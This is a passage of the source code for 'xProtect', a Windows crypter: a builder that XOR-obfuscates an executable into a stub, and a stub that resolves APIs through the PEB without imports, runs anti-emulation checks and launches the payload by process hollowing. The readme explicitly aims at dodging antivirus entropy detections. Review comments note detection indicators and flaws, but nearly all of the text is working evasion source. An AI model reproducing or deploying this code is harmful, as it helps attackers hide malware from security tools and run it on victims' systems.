242 | WriteFile( hFile, &stubISH[i], sizeof( IMAGE_SECTION_HEADER ), &dwBytesWritten, 0 );
243 | }
244 |
245 | DWORD dwPadding = stubINH.OptionalHeader.SizeOfHeaders - ( sizeof( IMAGE_DOS_HEADER ) + sizeof( IMAGE_NT_HEADERS ) + ( sizeof( IMAGE_SECTION_HEADER ) * stubINH.FileHeader.NumberOfSections ) ); // zero fill up to SizeOfHeaders
246 | BYTE* pPadding = (BYTE*)VirtualAlloc( NULL, dwPadding, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
247 | if ( !pPadding )
248 | goto clean_up;
249 |
250 | memset( pPadding, 0, dwPadding );
251 | SetFilePointer( hFile, 0, 0, FILE_END );
252 | WriteFile( hFile, pPadding, dwPadding, &dwBytesWritten, 0 );
253 | VirtualFree( pPadding, 0, MEM_RELEASE );
254 |
255 | BYTE* pStubCode = (BYTE*)VirtualAlloc( NULL, dwStubCodeTotal, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
256 | if ( !pStubCode )
257 | goto clean_up;
258 |
259 | memset( pStubCode, 0, dwStubCodeTotal );
260 | memcpy( pStubCode, (void*)dwStubCodeBase, dwStubCodeSize );
261 |
262 | FixAddress( pStubCode, dwStubCodeSize, dwStubDataBase, stubINH.OptionalHeader.ImageBase + stubISH[1].VirtualAddress ); // repoint stub-data references at the new ".data" address
263 |
264 | SetFilePointer( hFile, 0, 0, FILE_END );
265 | WriteFile( hFile, pStubCode, stubISH[0].SizeOfRawData, &dwBytesWritten, 0 );
266 | VirtualFree( pStubCode, 0, MEM_RELEASE );
267 |
268 | BYTE* pStubData = (BYTE*)VirtualAlloc( NULL, stubISH[1].SizeOfRawData, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
269 | if ( !pStubData )
270 | goto clean_up;
271 |
272 | memset( pStubData, 0, stubISH[1].SizeOfRawData );
273 | memcpy( pStubData, (void*)dwStubDataBase, dwStubDataSize ); // includes bKey, dwFileSize and the split parameters
274 |
275 | InFile( pFileBuffer, (BYTE*)( pStubData + dwStubDataSize ), dwSize, inc_every, inc_multi ); // transformed input is appended right after the stub data
276 |
277 | SetFilePointer( hFile, 0, 0, FILE_END );
278 | WriteFile( hFile, pStubData, stubISH[1].SizeOfRawData, &dwBytesWritten, 0 );
279 |
280 | VirtualFree( pStubData, 0, MEM_RELEASE );
281 |
282 | bReturn = true;
283 | clean_up:
284 | CloseHandle( hFile );
285 | VirtualFree( pFileBuffer, 0, MEM_RELEASE );
286 |
287 | return bReturn;
288 | }
--------------------------------------------------------------------------------
/xProtect Source/build.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
// Builds "Crypted.exe" from the executable at szFilePath; returns true on success.
// Defined in build.cpp.
3 | bool CryptFile( WCHAR* szFilePath );
--------------------------------------------------------------------------------
/xProtect Source/main.cpp:
--------------------------------------------------------------------------------
1 | #define _WIN32_WINNT _WIN32_WINNT_WINXP
2 |
3 | #include
4 | #include
5 | #include
6 |
7 | #include "build.h"
8 | #include "stub.h"
9 |
// Command-line front end of the builder.
//
// Expects the path of the executable to wrap as argv[1], checks that the path
// exists, seeds rand() and calls CryptFile(). Always returns 0, whether or not
// the build succeeded.
//
// The only entropy behind the key is GetTickCount() fed into rand(), so the key
// is weak by construction; CryptFile also stores it in the output file.
10 | int _tmain( int argc, wchar_t* argv[] )
11 | {
12 | if ( argc < 2 )
13 | {
14 | wprintf( L"\n************************************************\n" );
15 | wprintf( L"ERROR: Not enough parameters!\n" );
16 | wprintf( L"Format: %s file_to_crypt.exe\n", argv[0] );
17 | wprintf( L"************************************************\n" );
18 | return 0;
19 | }
20 |
21 | DWORD dwFileAttributes = GetFileAttributes( argv[1] ); // existence check only; the attributes themselves are not inspected
22 |
23 | if ( dwFileAttributes == INVALID_FILE_ATTRIBUTES )
24 | {
25 | int iError = GetLastError();
26 | wprintf( L"\n************************************************\n" );
27 | wprintf( L"ERROR: GetLastError(): 0x%X!\n", iError );
28 | wprintf( L"Format: %s file_to_crypt.exe\n", argv[0] );
29 | wprintf( L"************************************************\n" );
30 | return 0;
31 | }
32 |
33 | srand( GetTickCount() ); // seed for GenerateKey(), which draws the key bytes from rand()
34 |
35 | if ( CryptFile( argv[1] ) )
36 | {
37 | wprintf( L"\n\n************************************************\n" );
38 | wprintf( L"File successfully crypted!\n" );
39 | wprintf( L"************************************************\n" );
40 | }
41 | else
42 | {
43 | wprintf( L"\n\n************************************************\n" );
44 | wprintf( L"Failed to crypt file!\n" );
45 | wprintf( L"************************************************\n" );
46 | }
47 |
48 | system( "pause" );
49 |
50 | return 0;
51 | }
--------------------------------------------------------------------------------
/xProtect Source/readme.txt:
--------------------------------------------------------------------------------
1 | make new EMPTY console project in VS2008 (any other should work), put .cpp .h files in the folder they're supposed to be in
2 | drag & drop/add the .cpp .h files onto the project
3 | compile in VS2008 in release mode with settings from sample_settings.png
4 |
5 | adjust modifiers in build.cpp in case of entropy detections
6 | any API called in stub needs to be imported dynamically
7 |
8 | Nemesis loves you all
--------------------------------------------------------------------------------
/xProtect Source/stub.cpp:
--------------------------------------------------------------------------------
1 | #include
2 |
// Forward declarations for the stub. Everything defined below lives in the
// .stubc/.stubd sections that the builder copies into the output file.
3 | DWORD_PTR pGetProcAddress( void* pDLL, char* szAPI );
4 | wchar_t* GetCurrentFilePath();
5 | void* GetKernel32Base();
6 | void* GetNtdllBase();
7 | void RunFile( BYTE* pFile );
8 | void SIMPLE_ENCRYPT( BYTE* pBuffer, DWORD dwLen, BYTE* bKey, DWORD dwKeyLen, bool bSkip );
9 | DWORD Align( DWORD dwVal, DWORD dwAlignment );
10 | BYTE* GetFile( DWORD dwStartAddr, DWORD dwSize, int inc_every, int inc_multi );
11 |
// Local replacements for CRT routines (the stub cannot rely on the CRT, see the
// comment above sc_strcmp).
12 | int sc_strcmp( const char* _Str1, const char* _Str2 );
13 | void* sc_memcpy( void* _Dst, const void* _Src, size_t _Size );
14 | void* sc_memset( void* _Dst, int Val, size_t _Size );
15 | wchar_t* sc_wcscpy(wchar_t * str1,const wchar_t * str2);
16 |
// Stub data segment. Everything between data_seg(push) and data_seg(pop) is placed
// in a section named ".stubd" (flags E, W, R, S), which the builder copies
// verbatim into the ".data" section of the output file.
17 | #pragma comment( linker, "/section:.stubd,EWRS" )
18 | #pragma data_seg( push, ".stubd" )
19 |
20 | wchar_t* szCurrentFilePath = NULL;
21 |
// Filled in by the builder (CryptFile) before the stub data is written out.
22 | DWORD dwFileSize = 0;
23 | DWORD dwPaddedFileSize = 0;
24 |
25 | DWORD dwSplitMulti = 0;
26 | DWORD dwSplitIncrease = 0;
27 |
// The two markers delimit the range that SIMPLE_ENCRYPT is applied to, by the
// builder and again by stub_start at run time. Assuming the compiler keeps these
// variables contiguous and in declaration order (TODO confirm in a built sample),
// the API names below are not readable as plain strings in an output file.
28 | DWORD dwEncryptStartMarker = 0;
29 | char szVirtualAlloc[] = "VirtualAlloc";
30 | char szVirtualFree[] = "VirtualFree";
31 | char szExitProcess[] = "ExitProcess";
32 | char szCreateProcessW[] = "CreateProcessW";
33 | char szGetThreadContext[] = "GetThreadContext";
34 | char szSetThreadContext[] = "SetThreadContext";
35 | char szReadProcessMemory[] = "ReadProcessMemory";
36 | char szWriteProcessMemory[] = "WriteProcessMemory";
37 | char szVirtualAllocEx[] = "VirtualAllocEx";
38 | char szResumeThread[] = "ResumeThread";
39 | char szNtUnmapViewOfSection[] = "NtUnmapViewOfSection";
40 | DWORD dwEncryptEndMarker = 0;
41 |
// Declared after the end marker, so these two names are outside the transformed
// range and remain plain strings in the output: a usable static indicator when
// seen in a file that declares no import table.
42 | char szGetProcAddress[] = "GetProcAddress";
43 | char szNtResumeThread[] = "NtResumeThread";
44 |
// Function pointers resolved at run time by stub_start; the output file declares
// no imports for any of these APIs.
45 | BOOL (WINAPI * pCreateProcessW)(
46 | LPCWSTR lpApplicationName,
47 | LPWSTR lpCommandLine,
48 | LPSECURITY_ATTRIBUTES lpProcessAttributes,
49 | LPSECURITY_ATTRIBUTES lpThreadAttributes,
50 | BOOL bInheritHandles,
51 | DWORD dwCreationFlags,
52 | LPVOID lpEnvironment,
53 | LPCWSTR lpCurrentDirectory,
54 | LPSTARTUPINFOW lpStartupInfo,
55 | LPPROCESS_INFORMATION lpProcessInformation ) = NULL;
56 |
57 | LPVOID (WINAPI * pVirtualAlloc)( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect ) = NULL;
58 | BOOL (WINAPI * pVirtualFree)( LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType ) = NULL;
59 | VOID (WINAPI * pExitProcess)( UINT uExitCode ) = NULL;
60 | BOOL (WINAPI * pGetThreadContext)( HANDLE hThread, LPCONTEXT lpContext ) = NULL;
61 | BOOL (WINAPI * pSetThreadContext)( HANDLE hThread, CONST CONTEXT *lpContext ) = NULL;
62 | BOOL (WINAPI * pReadProcessMemory)( HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesRead ) = NULL;
63 | BOOL (WINAPI * pWriteProcessMemory)( HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten ) = NULL;
64 | LPVOID (WINAPI * pVirtualAllocEx)( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect ) = NULL;
65 | DWORD (WINAPI * pResumeThread)( HANDLE hThread ) = NULL;
66 | LONG (NTAPI * pNtUnmapViewOfSection)( HANDLE ProcessHandle, PVOID BaseAddress ) = NULL;
67 | FARPROC (WINAPI * real_GetProcAddress)( HMODULE hModule, LPCSTR lpProcName ) = NULL;
68 | NTSTATUS (NTAPI * pNtResumeThread)( HANDLE ThreadHandle, PULONG SuspendCount ) = NULL;
69 |
// Key used by SIMPLE_ENCRYPT; written by the builder's GenerateKey() and shipped
// inside the output file together with the data it protects.
70 | BYTE bKey[30] = { 0 };
71 |
// stub_start reads the embedded file starting sizeof(DWORD) bytes after the
// address of this marker; the builder appends the file right after the stub data.
72 | DWORD bFileMarker = 0;
73 |
74 | #pragma data_seg( pop )
75 |
76 | #pragma comment( linker, "/section:.stubc,EWRS" )
77 | #pragma code_seg( push, ".stubc" )
78 |
// Entry point of the built file (CryptFile points AddressOfEntryPoint here).
//
// Sequence, as visible below:
//   1. Find kernel32 and ntdll through the PEB and resolve GetProcAddress and
//      NtResumeThread without using an import table.
//   2. Call NtResumeThread twice with invalid arguments and return immediately
//      unless the results are 0xC0000008 (STATUS_INVALID_HANDLE) and 0xC0000005
//      (STATUS_ACCESS_VIOLATION).
//      NOTE(review): presumably an environment check; an emulator or sandbox that
//      answers these calls differently sees the stub exit without doing anything.
//   3. Reverse the SIMPLE_ENCRYPT pass over the API-name strings and resolve them.
//   4. Rebuild the embedded file from the bytes after bFileMarker (GetFile) and
//      reverse its SIMPLE_ENCRYPT pass.
//   5. Copy the path of the current executable and hand the file to RunFile().
//   6. Free both buffers and call ExitProcess(0).
//
// None of the resolved pointers is checked for NULL before use.
79 | void stub_start()
80 | {
81 | void* pKernel32Base = GetKernel32Base();
82 | void* pNtdllBase = GetNtdllBase();
83 |
84 | *(DWORD_PTR*)&real_GetProcAddress = pGetProcAddress( pKernel32Base, szGetProcAddress ); // manual export-table lookup
85 | *(DWORD_PTR*)&pNtResumeThread = (DWORD_PTR)real_GetProcAddress( (HMODULE)pNtdllBase, szNtResumeThread );
86 |
87 | LONG lNtStatus = pNtResumeThread( 0, 0 ); // null handle
88 | if ( lNtStatus != 0xC0000008 )
89 | return;
90 |
91 | lNtStatus = pNtResumeThread( (HANDLE)-1, (PULONG)-1 ); // invalid output pointer
92 | if ( lNtStatus != 0xC0000005 )
93 | return;
94 |
95 | SIMPLE_ENCRYPT( (BYTE*)&dwEncryptStartMarker, ( (DWORD)&dwEncryptEndMarker - (DWORD)&dwEncryptStartMarker ), bKey, sizeof( bKey ), false ); // same call as in the builder; the transform is its own inverse
96 |
97 | *(DWORD_PTR*)&pVirtualAlloc = pGetProcAddress( pKernel32Base, szVirtualAlloc );
98 | *(DWORD_PTR*)&pVirtualFree = pGetProcAddress( pKernel32Base, szVirtualFree );
99 | *(DWORD_PTR*)&pExitProcess = pGetProcAddress( pKernel32Base, szExitProcess );
100 | *(DWORD_PTR*)&pCreateProcessW = pGetProcAddress( pKernel32Base, szCreateProcessW );
101 | *(DWORD_PTR*)&pGetThreadContext = pGetProcAddress( pKernel32Base, szGetThreadContext );
102 | *(DWORD_PTR*)&pSetThreadContext = pGetProcAddress( pKernel32Base, szSetThreadContext );
103 | *(DWORD_PTR*)&pReadProcessMemory = pGetProcAddress( pKernel32Base, szReadProcessMemory );
104 | *(DWORD_PTR*)&pWriteProcessMemory = pGetProcAddress( pKernel32Base, szWriteProcessMemory );
105 | *(DWORD_PTR*)&pVirtualAllocEx = pGetProcAddress( pKernel32Base, szVirtualAllocEx );
106 | *(DWORD_PTR*)&pResumeThread = pGetProcAddress( pKernel32Base, szResumeThread );
107 |
108 | *(DWORD_PTR*)&pNtUnmapViewOfSection = (DWORD_PTR)real_GetProcAddress( (HMODULE)pNtdllBase, szNtUnmapViewOfSection );
109 |
110 |
111 | DWORD dwFileStart = (DWORD)( &bFileMarker ) + sizeof( DWORD ); // first byte after the marker variable
112 | BYTE* pFile = GetFile( dwFileStart, dwFileSize, dwSplitIncrease, dwSplitMulti );
113 | SIMPLE_ENCRYPT( pFile, dwFileSize, bKey, sizeof( bKey ), true );
114 |
115 | szCurrentFilePath = (wchar_t*)pVirtualAlloc( NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
116 | wchar_t* szTempPath = GetCurrentFilePath();
117 | sc_wcscpy( szCurrentFilePath, szTempPath );
118 |
119 | RunFile( pFile );
120 |
121 | pVirtualFree( szCurrentFilePath, 0, MEM_RELEASE );
122 | pVirtualFree( pFile, 0, MEM_RELEASE );
123 | pExitProcess( 0 );
124 | }
125 |
// Runs the in-memory PE image pFile inside a new, suspended copy of the current
// executable (process hollowing, MITRE ATT&CK T1055.012).
//
// pFile - raw file image; only its DOS and NT signatures are validated.
//
// Sequence: CreateProcessW(CREATE_SUSPENDED) on szCurrentFilePath, GetThreadContext,
// read the child's image base at Ebx + 8, NtUnmapViewOfSection when that base
// equals the payload's preferred ImageBase, VirtualAllocEx with
// PAGE_EXECUTE_READWRITE, WriteProcessMemory for headers and each section, write
// the payload's ImageBase back at Ebx + 8, set Eax to the payload entry point,
// SetThreadContext, ResumeThread.
//
// What this leaves for detection and forensics:
//   - a process spawning a suspended child from its own image path, followed by
//     cross-process unmap / RWX allocation / writes / SetThreadContext;
//   - in the child, memory at the image base that does not match the file on
//     disk, mapped as private RWX rather than as an image section;
//   - every early return after CreateProcessW succeeded leaves the child
//     suspended and unterminated, and pi.hProcess/pi.hThread are never closed.
//
// The use of Ebx/Eax and DWORD addresses makes this 32-bit only. The allocation is
// always requested at the child's current base (dwImageBase), even when that
// differs from the payload's preferred ImageBase, and no relocations are applied.
126 | void RunFile( BYTE* pFile )
127 | {
128 | IMAGE_DOS_HEADER* pIDH = (IMAGE_DOS_HEADER*)pFile;
129 | if ( pIDH->e_magic != IMAGE_DOS_SIGNATURE )
130 | return;
131 |
132 | IMAGE_NT_HEADERS* pINH = (IMAGE_NT_HEADERS*)( pFile + pIDH->e_lfanew );
133 | if ( pINH->Signature != IMAGE_NT_SIGNATURE )
134 | return;
135 |
136 | IMAGE_SECTION_HEADER* pISH = IMAGE_FIRST_SECTION( pINH );
137 |
138 | STARTUPINFOW si;
139 | PROCESS_INFORMATION pi;
140 |
141 | sc_memset( &si, 0, sizeof( STARTUPINFO ) ); // si.cb is left at 0
142 | sc_memset( &pi, 0, sizeof( PROCESS_INFORMATION ) );
143 |
144 | if ( !pCreateProcessW( szCurrentFilePath, 0, 0, 0, FALSE, CREATE_SUSPENDED, 0, 0, &si, &pi ) ) // child is a second instance of this same file
145 | return;
146 |
147 | CONTEXT* pContext = (CONTEXT*)pVirtualAlloc( NULL, sizeof( CONTEXT ), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE ); // result is not checked and never freed
148 | pContext->ContextFlags = CONTEXT_FULL;
149 |
150 | if ( !pGetThreadContext( pi.hThread, pContext ) )
151 | return;
152 |
153 | DWORD dwImageBase = 0;
154 | if ( !pReadProcessMemory( pi.hProcess, (LPCVOID)( pContext->Ebx + 8 ), &dwImageBase, sizeof( DWORD ), 0 ) ) // NOTE(review): presumably PEB.ImageBaseAddress of the suspended child (Ebx = PEB on x86) - confirm
155 | return;
156 |
157 | if ( dwImageBase == pINH->OptionalHeader.ImageBase )
158 | pNtUnmapViewOfSection( pi.hProcess, (PVOID)dwImageBase );
159 |
160 | BYTE* pTarget = (BYTE*)pVirtualAllocEx( pi.hProcess, (LPVOID)dwImageBase, pINH->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
161 | if ( !pTarget )
162 | return;
163 |
164 | //add more error checking if wanted but it's a bit redundant in stubs since it will just exit instead of crash
165 | //can remove most error checking in stub if dont care about crashing (instead of exit) in case something goes wrong somewhere
166 | pWriteProcessMemory( pi.hProcess, pTarget, pFile, pINH->OptionalHeader.SizeOfHeaders, 0 );
167 |
168 | for ( int i = 0; i < pINH->FileHeader.NumberOfSections; i++ )
169 | pWriteProcessMemory( pi.hProcess, (LPVOID)( pTarget + pISH[i].VirtualAddress ), (LPCVOID)( pFile + pISH[i].PointerToRawData ), pISH[i].SizeOfRawData, 0 );
170 |
171 | pWriteProcessMemory( pi.hProcess, (LPVOID)( pContext->Ebx + 8 ), &pINH->OptionalHeader.ImageBase, sizeof( DWORD ), 0 );
172 | pContext->Eax = (DWORD)( pTarget + pINH->OptionalHeader.AddressOfEntryPoint ); // NOTE(review): presumably the start address the suspended initial thread jumps to - confirm
173 | pSetThreadContext( pi.hThread, pContext );
174 | pResumeThread( pi.hThread );
175 | }
176 |
// Resolves an exported function by name by walking the export directory of an
// already loaded module, without calling the system's GetProcAddress.
//
// pDLL  - base address of the loaded module.
// szAPI - exported name to look for (exact, case-sensitive match via sc_strcmp).
// Returns the address of the export, or 0 if pDLL is NULL, the DOS/NT signature
// does not match, or the name is not found.
//
// Limits visible in the code: lookup is by name only (no ordinals), a forwarded
// export is returned as a plain address, and the export directory RVA is used
// without checking that it is non-zero.
//
// For analysts: resolving APIs this way is why the built file can run with no
// import table at all, so import-based triage sees nothing.
177 | DWORD_PTR pGetProcAddress( void* pDLL, char* szAPI )
178 | {
179 | if ( !pDLL )
180 | return 0;
181 |
182 | IMAGE_DOS_HEADER* pIDH = (IMAGE_DOS_HEADER*)pDLL;
183 | if ( pIDH->e_magic != IMAGE_DOS_SIGNATURE )
184 | return 0;
185 |
186 | IMAGE_NT_HEADERS* pINH = (IMAGE_NT_HEADERS*)( (BYTE*)pDLL + pIDH->e_lfanew );
187 | if ( pINH->Signature != IMAGE_NT_SIGNATURE )
188 | return 0;
189 |
190 | IMAGE_EXPORT_DIRECTORY* pIED = (IMAGE_EXPORT_DIRECTORY*)( (BYTE*)pDLL + pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress );
191 | DWORD* dwFunctions = (DWORD*)( (BYTE*)pDLL + pIED->AddressOfFunctions );
192 | WORD* wNameOrdinals = (WORD*)( (BYTE*)pDLL + pIED->AddressOfNameOrdinals );
193 | DWORD* dwNames = (DWORD*)( (BYTE*)pDLL + pIED->AddressOfNames );
194 |
195 | for ( unsigned int i = 0; i < pIED->NumberOfNames; i++ )
196 | {
197 | if ( !sc_strcmp( (char*)( (BYTE*)pDLL + dwNames[i] ), szAPI ) )
198 | return (DWORD_PTR)( (BYTE*)pDLL + dwFunctions[wNameOrdinals[i]] ); // name index -> ordinal index -> function RVA
199 | }
200 |
201 | return 0;
202 | }
203 |
// Returns a pointer read from process structures reachable through fs:[0x30];
// stub_start treats the result as the wide-character path of the running file.
// No API call is made.
//
// NOTE(review): on 32-bit Windows these offsets appear to be PEB ->
// ProcessParameters (+0x10) -> ImagePathName.Buffer (+0x3C); confirm against the
// structure layout of the target OS. x86 only (fs segment, MSVC inline asm).
204 | wchar_t* GetCurrentFilePath()
205 | {
206 | wchar_t* szExeName = NULL;
207 |
208 | __asm
209 | {
210 | mov eax, fs:[0x30]
211 | mov eax, [eax + 0x10]
212 | mov eax, [eax + 0x3C]
213 | mov szExeName, eax
214 | }
215 |
216 | return szExeName;
217 | }
218 |
// Returns the value at offset 0x18 of the third entry of a linked list reached
// through fs:[0x30]; stub_start uses it as the base address of kernel32.
//
// NOTE(review): presumably PEB -> Ldr (+0xC) -> InLoadOrderModuleList (+0xC), two
// forward links, then DllBase (+0x18). That relies on kernel32 being the third
// module in load order, which the code does not verify. x86 only.
//
// Reading the loader list through fs:[0x30] instead of calling GetModuleHandle
// is a common trait of position-independent code and a reasonable hunting
// pattern in a file that declares no imports.
219 | void* GetKernel32Base()
220 | {
221 | void* kernel32base = NULL;
222 |
223 | __asm
224 | {
225 | mov eax, fs:[0x30]
226 | mov eax, [eax + 0xC]
227 | mov eax, [eax + 0xC]
228 | mov eax, [eax]
229 | mov eax, [eax]
230 | mov eax, [eax + 0x18]
231 | mov kernel32base, eax
232 | }
233 |
234 | return kernel32base;
235 | }
236 |
// Same list walk as GetKernel32Base() but with a single forward link, i.e. the
// second entry; stub_start uses the result as the base address of ntdll.
//
// NOTE(review): presumably relies on ntdll being the second module in load
// order; the code does not check the module name. x86 only.
237 | void* GetNtdllBase()
238 | {
239 | void* ntdllbase = NULL;
240 |
241 | __asm
242 | {
243 | mov eax, fs:[0x30]
244 | mov eax, [eax + 0xC]
245 | mov eax, [eax + 0xC]
246 | mov eax, [eax]
247 | mov eax, [eax + 0x18]
248 | mov ntdllbase, eax
249 | }
250 |
251 | return ntdllbase;
252 | }
253 |
// In-place XOR transform used by both the builder and the stub. Applying it twice
// with the same key and bSkip restores the original bytes.
//
// pBuffer / dwLen - buffer to transform and its length.
// bKey / dwKeyLen - key bytes and key length.
// bSkip           - when true, only indices that are multiples of 3 are
//                   transformed; all other bytes are left as they are.
//
// What the arithmetic amounts to:
//   - the inner loop XORs the byte with every value 0..254, which is a fixed
//     constant (0xFF), so each processed byte becomes byte ^ 0xFF ^ bKey[d];
//   - d runs 1, 2, ..., dwKeyLen, 0, 1, ..., so the key stream repeats every
//     dwKeyLen + 1 steps and bKey[dwKeyLen] is read, one element past the key.
//
// For analysts: this is obfuscation, not encryption. The key ships in the same
// file, and with bSkip set two thirds of the embedded file are stored unmodified,
// so content-based signatures for the wrapped file may still partly match.
254 | void SIMPLE_ENCRYPT( BYTE* pBuffer, DWORD dwLen, BYTE* bKey, DWORD dwKeyLen, bool bSkip )
255 | {
256 | int a = 0;
257 | int b = 0;
258 | int d = 0;
259 | int c = 0;
260 |
261 | //skip encrypting once every 3rd byte, this is to reduce entropy, should not affect detections
262 | int inc_every = 3;
263 |
264 | for ( unsigned int i = 0; i < dwLen; i++ )
265 | {
266 | if ( bSkip && i % inc_every ) // skips every index that is NOT a multiple of 3
267 | continue;
268 |
269 | if ( d == dwKeyLen )
270 | d = 0;
271 | else
272 | d++;
273 |
274 | a = pBuffer[i];
275 | b = bKey[d];
276 |
277 | for ( c = 0; c < 255; c++ )
278 | a ^= c;
279 |
280 | pBuffer[i] = a ^ b;
281 | }
282 | }
283 |
// Rounds dwVal up to the next multiple of dwAlignment.
//
// Returns dwVal unchanged when it is already a multiple or when dwAlignment is 0.
// The addition is not checked for DWORD overflow.
284 | DWORD Align( DWORD dwVal, DWORD dwAlignment )
285 | {
286 | DWORD dwResult = dwVal;
287 |
288 | if ( dwAlignment )
289 | {
290 | if ( dwVal % dwAlignment )
291 | dwResult = ( dwVal + dwAlignment ) - ( dwVal % dwAlignment );
292 | }
293 |
294 | return dwResult;
295 | }
296 |
// Inverse of the builder's InFile(): collects dwSize bytes starting at
// dwStartAddr into a new buffer, stepping over inc_multi filler bytes after every
// index that is a multiple of inc_every.
//
// Returns the buffer obtained from pVirtualAlloc (read/write); stub_start frees
// it. The allocation result is not checked, and the source address is a DWORD,
// so this is 32-bit only.
297 | BYTE* GetFile( DWORD dwStartAddr, DWORD dwSize, int inc_every, int inc_multi )
298 | {
299 | BYTE* pFile = (BYTE*)pVirtualAlloc( NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
300 |
301 | int temp_inc = 0;
302 |
303 | for ( unsigned int i = 0; i < dwSize; i++ )
304 | {
305 | *(BYTE*)( pFile + i ) = *(BYTE*)( dwStartAddr + temp_inc );
306 | temp_inc++;
307 |
308 | if ( i % inc_every == 0 )
309 | temp_inc += inc_multi;
310 | }
311 |
312 | return pFile;
313 | }
314 |
315 | /* generic functions that would normally be in the CRT however we cant use that here */
// Byte-wise string comparison.
// Returns 0 when the strings are equal, -1 when the first differing byte of
// _Str1 is smaller (as unsigned char), 1 when it is larger.
316 | int sc_strcmp( const char* _Str1, const char* _Str2 )
317 | {
318 | int ret = 0;
319 |
320 | while (!(ret = *(unsigned char *)_Str1 - *(unsigned char *)_Str2) && *_Str2) // stop at the first difference or at the terminator
321 | ++_Str1, ++_Str2;
322 |
323 | if (ret < 0)
324 | ret = -1;
325 | else if (ret > 0)
326 | ret = 1 ;
327 |
328 | return ret;
329 | }
330 |
// Copies _Size bytes from _Src to _Dst one byte at a time, front to back, and
// returns the original _Dst. Overlapping ranges with _Dst above _Src are not
// handled.
331 | void* sc_memcpy( void* _Dst, const void* _Src, size_t _Size )
332 | {
333 | void* ret = _Dst;
334 |
335 | while (_Size--)
336 | {
337 | *(BYTE*)_Dst = *(BYTE*)_Src;
338 | _Dst = (BYTE*)_Dst + 1;
339 | _Src = (BYTE*)_Src + 1;
340 | }
341 |
342 | return ret;
343 | }
344 |
345 | //turn off optimizations due to some compiler bug
346 | #pragma optimize( "", off )
// Sets _Size bytes starting at _Dst to the low byte of Val and returns _Dst.
// The surrounding pragmas switch optimizations off for this one function.
347 | void* sc_memset( void* _Dst, int Val, size_t _Size )
348 | {
349 | BYTE *pb = (BYTE*)_Dst;
350 | BYTE *pbend = pb + _Size;
351 | while (pb != pbend)
352 | *pb++ = Val;
353 | return _Dst;
354 | }
355 | #pragma optimize( "", on )
356 |
// Copies the wide string str2, including its terminator, to str1 and returns
// str1. There is no length limit; the destination must be large enough.
357 | wchar_t* sc_wcscpy(wchar_t * str1,const wchar_t * str2)
358 | {
359 | wchar_t *save = str1;
360 |
361 | for (; (*str1 = *str2); ++str2, ++str1); // the assignment is the loop condition; ends after the terminator is copied
362 | return save;
363 | }
364 |
365 | #pragma code_seg( pop )
--------------------------------------------------------------------------------
/xProtect Source/stub.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include
4 |
// Stub data shared with the builder. build.cpp writes these before the stub data
// section is copied into the output file, and stub.cpp reads them at run time.
5 | extern BYTE bKey[30];
6 | extern DWORD dwFileSize;
7 | extern DWORD dwPaddedFileSize;
8 |
9 | extern DWORD dwSplitMulti;
10 | extern DWORD dwSplitIncrease;
11 |
// Addresses of these two variables delimit the range passed to SIMPLE_ENCRYPT.
12 | extern DWORD dwEncryptEndMarker;
13 | extern DWORD dwEncryptStartMarker;
14 |
// Entry point of the built file.
15 | void stub_start();
16 |
// In-place XOR transform and round-up helper, both defined in stub.cpp.
17 | void SIMPLE_ENCRYPT( BYTE* pBuffer, DWORD dwLen, BYTE* bKey, DWORD dwKeyLen, bool bSkip );
18 | DWORD Align( DWORD dwVal, DWORD dwAlignment );
--------------------------------------------------------------------------------